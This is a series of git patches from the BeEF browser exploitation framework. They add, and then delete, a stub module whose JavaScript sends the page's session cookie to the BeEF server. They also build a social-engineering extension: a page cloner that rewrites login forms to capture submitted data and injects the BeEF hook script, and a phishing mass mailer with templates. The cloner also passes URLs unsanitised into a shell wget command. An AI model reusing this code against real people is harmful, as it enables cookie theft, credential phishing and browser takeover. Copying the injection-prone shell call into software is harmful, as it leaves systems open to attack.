From 006719768a4ca4202dde87492543f5e1d2817c6b Mon Sep 17 00:00:00 2001
From: unknown <Ahmed@Terminator.(none)>
Date: Fri, 9 Mar 2012 01:38:37 +0200
Subject: [PATCH 001/397] Adding stub for Skype XSS module

---
 modules/exploits/skype_xss/command.js  | 21 +++++++++++++++++++++
 modules/exploits/skype_xss/config.yaml | 25 +++++++++++++++++++++++++
 modules/exploits/skype_xss/module.rb   | 24 ++++++++++++++++++++++++
 3 files changed, 70 insertions(+)
 create mode 100644 modules/exploits/skype_xss/command.js
 create mode 100644 modules/exploits/skype_xss/config.yaml
 create mode 100644 modules/exploits/skype_xss/module.rb

diff --git a/modules/exploits/skype_xss/command.js b/modules/exploits/skype_xss/command.js
new file mode 100644
index 000000000..7f0049186
--- /dev/null
+++ b/modules/exploits/skype_xss/command.js
@@ -0,0 +1,21 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie);
+
+});
+
diff --git a/modules/exploits/skype_xss/config.yaml b/modules/exploits/skype_xss/config.yaml
new file mode 100644
index 000000000..fb92775eb
--- /dev/null
+++ b/modules/exploits/skype_xss/config.yaml
@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        get_cookie:
+            enable: true
+            category: "Browser"
+            name: "Get Cookie"
+            description: "This module will retrieve the session cookie from the current page."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/skype_xss/module.rb b/modules/exploits/skype_xss/module.rb
new file mode 100644
index 000000000..ba0fc1350
--- /dev/null
+++ b/modules/exploits/skype_xss/module.rb
@@ -0,0 +1,24 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Get_cookie < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['cookie'] = @datastore['cookie']
+    save content
+  end
+
+end

From f10cf3eb5b4353a056c8282aef945802f94312c5 Mon Sep 17 00:00:00 2001
From: asaafan <a.m.saafan@gmail.com>
Date: Fri, 9 Mar 2012 01:53:07 +0200
Subject: [PATCH 002/397] Delete Skype XSS stub from main branch

---
 modules/exploits/skype_xss/command.js  | 21 ---------------------
 modules/exploits/skype_xss/config.yaml | 25 -------------------------
 modules/exploits/skype_xss/module.rb   | 24 ------------------------
 3 files changed, 70 deletions(-)
 delete mode 100644 modules/exploits/skype_xss/command.js
 delete mode 100644 modules/exploits/skype_xss/config.yaml
 delete mode 100644 modules/exploits/skype_xss/module.rb

diff --git a/modules/exploits/skype_xss/command.js b/modules/exploits/skype_xss/command.js
deleted file mode 100644
index 7f0049186..000000000
--- a/modules/exploits/skype_xss/command.js
+++ /dev/null
@@ -1,21 +0,0 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-beef.execute(function() {
-
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie);
-
-});
-
diff --git a/modules/exploits/skype_xss/config.yaml b/modules/exploits/skype_xss/config.yaml
deleted file mode 100644
index fb92775eb..000000000
--- a/modules/exploits/skype_xss/config.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-#
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
-#
-beef:
-    module:
-        get_cookie:
-            enable: true
-            category: "Browser"
-            name: "Get Cookie"
-            description: "This module will retrieve the session cookie from the current page."
-            authors: ["bcoles"]
-            target:
-                working: ["ALL"]
diff --git a/modules/exploits/skype_xss/module.rb b/modules/exploits/skype_xss/module.rb
deleted file mode 100644
index ba0fc1350..000000000
--- a/modules/exploits/skype_xss/module.rb
+++ /dev/null
@@ -1,24 +0,0 @@
-#
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
-#
-class Get_cookie < BeEF::Core::Command
-
-  def post_execute
-    content = {}
-    content['cookie'] = @datastore['cookie']
-    save content
-  end
-
-end

From 558ca03ef6f432c82dc2fec1c5078e2aeb0a9ee1 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 27 Aug 2012 10:28:03 +0100
Subject: [PATCH 003/397] Social Eng. extension: added basic structure and web
 cloner

---
 .gitignore                                    |   3 +-
 extensions/social_engineering/config.yaml     |  24 ++++
 extensions/social_engineering/extension.rb    |  31 +++++
 .../web_cloner/interceptor.rb                 |  56 +++++++++
 .../web_cloner/web_cloner.rb                  | 115 ++++++++++++++++++
 5 files changed, 228 insertions(+), 1 deletion(-)
 create mode 100644 extensions/social_engineering/config.yaml
 create mode 100644 extensions/social_engineering/extension.rb
 create mode 100644 extensions/social_engineering/web_cloner/interceptor.rb
 create mode 100644 extensions/social_engineering/web_cloner/web_cloner.rb

diff --git a/.gitignore b/.gitignore
index c02e0a406..9ebc010fe 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,4 @@
 beef.db
 test/msf-test
-custom-config.yaml
\ No newline at end of file
+custom-config.yaml
+extensions/social_engineering/web_cloner/cloned_pages
\ No newline at end of file
diff --git a/extensions/social_engineering/config.yaml b/extensions/social_engineering/config.yaml
new file mode 100644
index 000000000..d3b279ba6
--- /dev/null
+++ b/extensions/social_engineering/config.yaml
@@ -0,0 +1,24 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    extension:
+        social_engineering:
+            enable: true 
+            name: 'Social Engineering'
+            authors: ["antisnatchor"]
+            web_cloner:
+                add_beef_hook: true
+                user_agent: "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2"
diff --git a/extensions/social_engineering/extension.rb b/extensions/social_engineering/extension.rb
new file mode 100644
index 000000000..95edcfe2d
--- /dev/null
+++ b/extensions/social_engineering/extension.rb
@@ -0,0 +1,31 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+module Extension
+module SocialEngineering
+  extend BeEF::API::Extension
+
+  @short_name = 'social_engineering'
+  @full_name = 'Social Engineering'
+  @description = 'Phishing attacks for your pleasure: web page cloner (POST interceptor and BeEF goodness), highly configurable mass mailer, etc.'
+end
+end
+end
+
+require 'extensions/social_engineering/web_cloner/web_cloner'
+require 'extensions/social_engineering/web_cloner/interceptor'
+
+
diff --git a/extensions/social_engineering/web_cloner/interceptor.rb b/extensions/social_engineering/web_cloner/interceptor.rb
new file mode 100644
index 000000000..7eba2ad46
--- /dev/null
+++ b/extensions/social_engineering/web_cloner/interceptor.rb
@@ -0,0 +1,56 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Extension
+    module SocialEngineering
+
+      class Interceptor < Sinatra::Base
+
+      def initialize(file_path)
+        super
+        @config = BeEF::Core::Configuration.instance
+        @cloned_page = ""
+        File.open(file_path,'r').each do |line|
+          @cloned_page += line
+        end
+      end
+
+      # intercept GET
+      get "/" do
+        print_info "GET request"
+        @cloned_page
+      end
+
+      # intercept POST
+      # the 'action' attribute of the 'form' element is modified to the URI /
+      # in this way the request can be intercepted
+      post "/" do
+        print_info "POST request"
+        request.body.rewind
+        data = request.body.read
+        print_info "Intercepted data:"
+        print_info data
+
+        #todo: do a GET request on the target website, retrieve the respone headers and check if X-Frame-Options is present
+        #todo: or framebusting is present. If is not present, open the original URL in an iFrame, otherwise redirect the user
+        #todo: to the original page
+      end
+
+      end
+    end
+  end
+end
+
diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb
new file mode 100644
index 000000000..f962b4e90
--- /dev/null
+++ b/extensions/social_engineering/web_cloner/web_cloner.rb
@@ -0,0 +1,115 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Extension
+    module SocialEngineering
+      class WebCloner
+        include Singleton
+
+
+        def initialize
+          @http_server = BeEF::Core::Server.instance
+          @config = BeEF::Core::Configuration.instance
+          @cloned_pages_dir = "#{File.expand_path('../../../../extensions/social_engineering/web_cloner', __FILE__)}/cloned_pages/"
+        end
+
+        def clone_page(url)
+          #todo see web_cloner.rb, work perfectly
+          # output.html and output2.html (the one with the form action modified to /)
+          # must be stored in cloned_pages
+          print_info "Cloning page at URL #{url}"
+          uri = URI(url)
+
+          #output = url.split("/").last #todo test if http://google.com/ produces an error
+          output = uri.host
+          output_mod = "#{output}_mod"
+
+          user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent')
+
+          #todo: prevent Command Injection
+          wget = "wget '#{url}' -O #{@cloned_pages_dir + output} --no-check-certificate -c -k -U '#{user_agent}'"
+          IO.popen(wget.to_s) { |f| @result = f.gets }
+          print_debug @result
+          #todo, also check if the URL is valid with:
+          #unless (url =~ URI::regexp).nil?
+          #  # Correct URL
+          #end
+
+          #todo: this should be the good way to prevent command injection, because the shell is not open.
+          #todo: there are issues:  Scheme missing when calling wget
+          #wget_path   = "wget"
+          #env         = {}
+          #args        = %W['#{url}' -O #{output} --no-check-certificate -c -k -U #{user_agent}]
+          #IO.popen([env, wget_path, *args], 'r+') { |f| @result = f.gets }
+
+
+          #if !File.writable?(File.basename(@cloned_pages_dir + output_mod))
+          #  print_info "Cannot write to file..."
+          #  IO.popen("chmod 777 #{@cloned_pages_dir}") { |f| @result = f.gets }
+          #  sleep 2
+          #end
+
+          File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file|
+            File.open("#{@cloned_pages_dir + output}", 'r').each do |line|
+              # Modify the <form> line changing the action URI to / in order to be properly intercepted by BeEF
+              if line.include?("<form ")
+                line_attrs = line.split(" ")
+                count = 0
+                #probably doable also with map!
+                line_attrs.each do |attr|
+                  if attr.include? "action=\""
+                    print_info "Form action found."
+                    break
+                  end
+                  count += 1
+                end
+                line_attrs[count] = "action=\"/#{output}\""
+                mod_form = line_attrs.join(" ")
+                print_info "Form action value changed to / in order to be intercepted."
+                out_file.print mod_form
+              # Add the BeEF hook
+              elsif line.include?("</head>") && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook')
+                out_file.print add_beef_hook(line)
+                print_info "Added BeEF hook."
+              else
+                out_file.print line
+              end
+            end
+          end
+          print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]"
+
+          file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
+          @http_server.mount("/#{output}", BeEF::Extension::SocialEngineering::Interceptor.new(file_path))
+          print_info "Mounting cloned page on URL #{output}"
+          @http_server.remap
+        end
+
+        private
+        # Replace </head> with <BeEF_hook></head>
+        def add_beef_hook(line)
+           host = @config.get('beef.http.host')
+           port = @config.get('beef.http.port')
+           js = @config.get('beef.http.hook_file')
+           hook = "http://#{host}:#{port}#{js}"
+           line.gsub!("</head>","<script type=\"text/javascript\" src=\"#{hook}\"></script>\n</head>")
+           line
+        end
+
+      end
+    end
+  end
+end
+

From 26c86951a4f29f9612a75ed59e5d725a9e54324d Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 27 Aug 2012 14:30:10 +0100
Subject: [PATCH 004/397] Social Eng. extension: added mass mailer

---
 extensions/social_engineering/config.yaml     |   8 +
 extensions/social_engineering/extension.rb    |   1 +
 .../mass_mailer/mass_mailer.rb                | 173 ++++++++++++++++++
 3 files changed, 182 insertions(+)
 create mode 100644 extensions/social_engineering/mass_mailer/mass_mailer.rb

diff --git a/extensions/social_engineering/config.yaml b/extensions/social_engineering/config.yaml
index d3b279ba6..98e2852d6 100644
--- a/extensions/social_engineering/config.yaml
+++ b/extensions/social_engineering/config.yaml
@@ -22,3 +22,11 @@ beef:
             web_cloner:
                 add_beef_hook: true
                 user_agent: "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2"
+            mass_mailer:
+                user_agent: "Microsoft-MacOutlook/12.12.0.111556"
+                host: "smtp.gmail.com"
+                port: 587
+                use_tls: true
+                helo: "gmail.com" # this is usually the domain name
+                from: "yourmail@gmail.com"
+                password: "yourpass"
diff --git a/extensions/social_engineering/extension.rb b/extensions/social_engineering/extension.rb
index 95edcfe2d..33ca7ac31 100644
--- a/extensions/social_engineering/extension.rb
+++ b/extensions/social_engineering/extension.rb
@@ -27,5 +27,6 @@ end
 
 require 'extensions/social_engineering/web_cloner/web_cloner'
 require 'extensions/social_engineering/web_cloner/interceptor'
+require 'extensions/social_engineering/mass_mailer/mass_mailer'
 
 
diff --git a/extensions/social_engineering/mass_mailer/mass_mailer.rb b/extensions/social_engineering/mass_mailer/mass_mailer.rb
new file mode 100644
index 000000000..11c0e3aae
--- /dev/null
+++ b/extensions/social_engineering/mass_mailer/mass_mailer.rb
@@ -0,0 +1,173 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Extension
+    module SocialEngineering
+      class MassMailer
+        require 'net/smtp'
+        require 'base64'
+        include Singleton
+
+        def initialize
+          @config = BeEF::Core::Configuration.instance
+          @user_agent = @config.get('beef.extension.social_engineering.mass_mailer.user_agent')
+          @host = @config.get('beef.extension.social_engineering.mass_mailer.host')
+          @port = @config.get('beef.extension.social_engineering.mass_mailer.port')
+          @helo = @config.get('beef.extension.social_engineering.mass_mailer.helo')
+          @from = @config.get('beef.extension.social_engineering.mass_mailer.from')
+          @password = @config.get('beef.extension.social_engineering.mass_mailer.password')
+
+          @subject = "Hi from BeEF"
+        end
+
+        # tos_hash is an Hash like:
+        # 'antisnatchor@gmail.com' => 'Michele'
+        # 'ciccio@pasticcio.com' => 'Ciccio'
+        def send_email(tos_hash)
+          # create new SSL context and disable CA chain validation
+          if @config.get('beef.extension.social_engineering.mass_mailer.use_tls')
+            @ctx = OpenSSL::SSL::SSLContext.new
+            @ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE # In case the SMTP server uses a self-signed cert, we proceed anyway
+            @ctx.ssl_version = "TLSv1"
+          end
+
+          # create a new SMTP object, enable TLS with the previous instantiated context, and connects to the server
+          smtp = Net::SMTP.new(@host, @port)
+          smtp.enable_starttls(@ctx) unless @config.get('beef.extension.social_engineering.mass_mailer.use_tls') == false
+          smtp.start(@helo, @from, @password, :login) do |smtp|
+            tos_hash.each do |mail, name|
+            message = compose_email(mail, name, @subject)
+            smtp.send_message(message, @from, mail)
+            end
+          end
+        end
+
+        #todo sending to hostmonster the email is probably flagged as spam:
+        # todo: error -> 550 550 Administrative prohibition (state 17
+
+        def compose_email(to, name, subject)
+           msg_id = random_string(50)
+           boundary = "------------#{random_string(24)}"
+           rel_boundary = "------------#{random_string(24)}"
+           plain_text = "Hi #{name},\nPlease be sure to check this link:\n"
+
+           @file_path = '/Users/morru/WORKS/BeEF/beef-44Con-code/extensions/social_engineering/mass_mailer/templates/default/'
+           file = 'beef_logo.png'
+
+           header = email_headers(@from, @user_agent, to, name, subject, msg_id, boundary)
+           plain_body = email_plain_body(plain_text,boundary)
+           rel_header = email_related(rel_boundary)
+           html_body = email_html_body(rel_boundary, file, plain_text)
+           image = email_add_image(file,rel_boundary)
+           close = email_close(boundary)
+
+           message = header + plain_body + rel_header + html_body + image + close
+           print_debug "Raw Email content:\n #{message}"
+           message
+        end
+
+        def email_headers(from, user_agent, to, name, subject, msg_id, boundary)
+          headers = <<EOF
+From: Michele Orru #{from}
+User-Agent: #{user_agent}
+To: #{name} #{to}
+Message-ID: <msg_id@#{@host}>
+Subject: #{subject}
+MIME-Version: 1.0
+Content-Type: multipart/alternative;
+ boundary=#{boundary}
+
+This is a multi-part message in MIME format.
+--#{boundary}
+EOF
+          headers
+        end
+
+        def email_plain_body(plain_text, boundary)
+          plain_body = <<EOF
+Content-Type: text/plain; charset="utf8"
+Content-Transfer-Encoding:8bit
+
+#{plain_text}
+
+--#{boundary}
+EOF
+          plain_body
+        end
+
+        def email_related(rel_boundary)
+          related = <<EOF
+Content-Type: multipart/related;
+ boundary="#{rel_boundary}"
+
+
+--#{rel_boundary}
+EOF
+          related
+        end
+
+        def email_html_body(rel_boundary, file, plain_body)
+           html_body = <<EOF
+Content-Type: text/html; charset=ISO-8859-1
+Content-Transfer-Encoding: 7bit
+
+<html><head>
+<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"></head><body
+ bgcolor="#FFFFFF" text="#000000">
+#{plain_body}<br>
+  <br>
+  <img src="cid:#{file}" name="#{file}" alt="#{file}"><br>
+  <br>
+Thanks
+</body>
+</html>
+--#{rel_boundary}
+EOF
+           html_body
+        end
+
+        def email_add_image(file, rel_boundary)
+          file_encoded = [File.read(@file_path + file)].pack("m") # base64
+          image = <<EOF
+Content-Type: image/png;
+ name="#{file}"
+Content-Transfer-Encoding: base64
+Content-ID: <#{file}>
+Content-Disposition: inline;
+ filename="#{file}"
+
+#{file_encoded}
+--#{rel_boundary}
+EOF
+          image
+        end
+
+        def email_close(boundary)
+          close = <<EOF
+--#{boundary}--
+EOF
+          close
+        end
+
+        def random_string(length)
+           output = (0..length).map{ rand(36).to_s(36).upcase }.join
+           output
+        end
+      end
+    end
+  end
+end
+

From df056fb6887d901d2f2377b8e13c890774899a04 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 27 Aug 2012 16:10:40 +0100
Subject: [PATCH 005/397] Social Eng. extension: added configurable email
 templates

---
 extensions/social_engineering/config.yaml     |  11 ++-
 .../mass_mailer/mass_mailer.rb                |  92 +++++++++++-------
 .../templates/default/beef_logo.png           | Bin 0 -> 13283 bytes
 .../mass_mailer/templates/default/mail.html   |  19 ++++
 .../mass_mailer/templates/default/mail.plain  |   8 ++
 5 files changed, 94 insertions(+), 36 deletions(-)
 create mode 100644 extensions/social_engineering/mass_mailer/templates/default/beef_logo.png
 create mode 100644 extensions/social_engineering/mass_mailer/templates/default/mail.html
 create mode 100644 extensions/social_engineering/mass_mailer/templates/default/mail.plain

diff --git a/extensions/social_engineering/config.yaml b/extensions/social_engineering/config.yaml
index 98e2852d6..d5b3444b2 100644
--- a/extensions/social_engineering/config.yaml
+++ b/extensions/social_engineering/config.yaml
@@ -28,5 +28,14 @@ beef:
                 port: 587
                 use_tls: true
                 helo: "gmail.com" # this is usually the domain name
-                from: "yourmail@gmail.com"
+                from: "yourpass@gmail.com"
                 password: "yourpass"
+                # available templates
+                templates:
+                    default:
+                       # images are by default inline, so if you want to attach something, see below
+                       images: ["beef_logo.png"]#,"second_image.png"]
+                       images_cids:
+                          cid1: "beef_logo.png"
+                         #cid2: "second_image.png"
+                       attachment: [""]
diff --git a/extensions/social_engineering/mass_mailer/mass_mailer.rb b/extensions/social_engineering/mass_mailer/mass_mailer.rb
index 11c0e3aae..66a965f4f 100644
--- a/extensions/social_engineering/mass_mailer/mass_mailer.rb
+++ b/extensions/social_engineering/mass_mailer/mass_mailer.rb
@@ -23,22 +23,23 @@ module BeEF
 
         def initialize
           @config = BeEF::Core::Configuration.instance
-          @user_agent = @config.get('beef.extension.social_engineering.mass_mailer.user_agent')
-          @host = @config.get('beef.extension.social_engineering.mass_mailer.host')
-          @port = @config.get('beef.extension.social_engineering.mass_mailer.port')
-          @helo = @config.get('beef.extension.social_engineering.mass_mailer.helo')
-          @from = @config.get('beef.extension.social_engineering.mass_mailer.from')
-          @password = @config.get('beef.extension.social_engineering.mass_mailer.password')
+          @config_prefix = "beef.extension.social_engineering.mass_mailer"
+          @templates_dir = "#{File.expand_path('../../../../extensions/social_engineering/mass_mailer/templates', __FILE__)}/"
 
-          @subject = "Hi from BeEF"
+          @user_agent = @config.get("#{@config_prefix}.user_agent")
+          @host = @config.get("#{@config_prefix}.host")
+          @port = @config.get("#{@config_prefix}.port")
+          @helo = @config.get("#{@config_prefix}.helo")
+          @from = @config.get("#{@config_prefix}.from")
+          @password = @config.get("#{@config_prefix}.password")
         end
 
         # tos_hash is an Hash like:
         # 'antisnatchor@gmail.com' => 'Michele'
         # 'ciccio@pasticcio.com' => 'Ciccio'
-        def send_email(tos_hash)
+        def send_email(template, subject, tos_hash)
           # create new SSL context and disable CA chain validation
-          if @config.get('beef.extension.social_engineering.mass_mailer.use_tls')
+          if @config.get("#{@config_prefix}.use_tls")
             @ctx = OpenSSL::SSL::SSLContext.new
             @ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE # In case the SMTP server uses a self-signed cert, we proceed anyway
             @ctx.ssl_version = "TLSv1"
@@ -46,10 +47,10 @@ module BeEF
 
           # create a new SMTP object, enable TLS with the previous instantiated context, and connects to the server
           smtp = Net::SMTP.new(@host, @port)
-          smtp.enable_starttls(@ctx) unless @config.get('beef.extension.social_engineering.mass_mailer.use_tls') == false
+          smtp.enable_starttls(@ctx) unless @config.get("#{@config_prefix}.use_tls") == false
           smtp.start(@helo, @from, @password, :login) do |smtp|
             tos_hash.each do |mail, name|
-            message = compose_email(mail, name, @subject)
+            message = compose_email(mail, name, subject, template)
             smtp.send_message(message, @from, mail)
             end
           end
@@ -58,23 +59,27 @@ module BeEF
         #todo sending to hostmonster the email is probably flagged as spam:
         # todo: error -> 550 550 Administrative prohibition (state 17
 
-        def compose_email(to, name, subject)
+        def compose_email(to, name, subject, template)
            msg_id = random_string(50)
            boundary = "------------#{random_string(24)}"
            rel_boundary = "------------#{random_string(24)}"
-           plain_text = "Hi #{name},\nPlease be sure to check this link:\n"
 
-           @file_path = '/Users/morru/WORKS/BeEF/beef-44Con-code/extensions/social_engineering/mass_mailer/templates/default/'
-           file = 'beef_logo.png'
+           link = "http://127.0.0.1:3000/demos/basic.html"
+           linktext = "http://antisnatchor.com"
 
            header = email_headers(@from, @user_agent, to, name, subject, msg_id, boundary)
-           plain_body = email_plain_body(plain_text,boundary)
+           plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain"),boundary)
            rel_header = email_related(rel_boundary)
-           html_body = email_html_body(rel_boundary, file, plain_text)
-           image = email_add_image(file,rel_boundary)
+           html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain"),rel_boundary)
+
+           images = ""
+           @config.get("#{@config_prefix}.templates.default.images").each do |image|
+             images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
+           end
+
            close = email_close(boundary)
 
-           message = header + plain_body + rel_header + html_body + image + close
+           message = header + plain_body + rel_header + html_body + images + close
            print_debug "Raw Email content:\n #{message}"
            message
         end
@@ -119,35 +124,27 @@ EOF
           related
         end
 
-        def email_html_body(rel_boundary, file, plain_body)
+        def email_html_body(html_body, rel_boundary)
            html_body = <<EOF
 Content-Type: text/html; charset=ISO-8859-1
 Content-Transfer-Encoding: 7bit
 
-<html><head>
-<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"></head><body
- bgcolor="#FFFFFF" text="#000000">
-#{plain_body}<br>
-  <br>
-  <img src="cid:#{file}" name="#{file}" alt="#{file}"><br>
-  <br>
-Thanks
-</body>
-</html>
+#{html_body}
 --#{rel_boundary}
 EOF
            html_body
         end
 
-        def email_add_image(file, rel_boundary)
-          file_encoded = [File.read(@file_path + file)].pack("m") # base64
+        def email_add_image(name, path, rel_boundary)
+          file_encoded = [File.read(path)].pack("m") # base64 encoded
+          #todo: content-type must be determined at least from file extension, not hardcoded
           image = <<EOF
 Content-Type: image/png;
- name="#{file}"
+ name="#{name}"
 Content-Transfer-Encoding: base64
-Content-ID: <#{file}>
+Content-ID: <#{name}>
 Content-Disposition: inline;
- filename="#{file}"
+ filename="#{name}"
 
 #{file_encoded}
 --#{rel_boundary}
@@ -162,6 +159,31 @@ EOF
           close
         end
 
+        # Replaces placeholder values from the plain/html email templates
+        def parse_template(name, link, linktext, template_path)
+          result = ""
+          img_config = "#{@config_prefix}.templates.default.images_cids"
+          img_count = 0
+          File.open(template_path, 'r').each do |line|
+             # change the Recipient name
+             if line.include?("__name__")
+               result += line.gsub("__name__",name)
+             # change the link/linktext
+             elsif line.include?("__link__")
+               result += line.gsub("__link__",link).gsub("__linktext__",linktext)
+             # change images cid/name/alt
+             elsif line.include?("src=\"cid:__")
+               img_count += 1
+               result += line.gsub("__cid#{img_count}__",
+                                   @config.get("#{img_config}.cid#{img_count}")).gsub("__img#{img_count}__",
+                                   @config.get("#{img_config}.cid#{img_count}"))
+             else
+               result += line
+             end
+          end
+          result
+        end
+
         def random_string(length)
            output = (0..length).map{ rand(36).to_s(36).upcase }.join
            output
diff --git a/extensions/social_engineering/mass_mailer/templates/default/beef_logo.png b/extensions/social_engineering/mass_mailer/templates/default/beef_logo.png
new file mode 100644
index 0000000000000000000000000000000000000000..24a718216bf0ce32eb57afe5514dd0dfad728f07
GIT binary patch
literal 13283
zcmV<9GaSr`P)<h;3K|Lk000e1NJLTq0077U005N;1^@s69Z0pe0000PbVXQnQ*UN;
zcVTj606}DLVr3vnZDD6+Qe|Oed2z{QJOBVQg-Jv~RCwC#eFs=nXZHR(4VVFj-lZvs
z0`?wDG_fU?n5gN=W=l5hmu%W@_MdE$&8F<8S7XYiZDN`w#@>S!Y$zxKf=EYtXJBTS
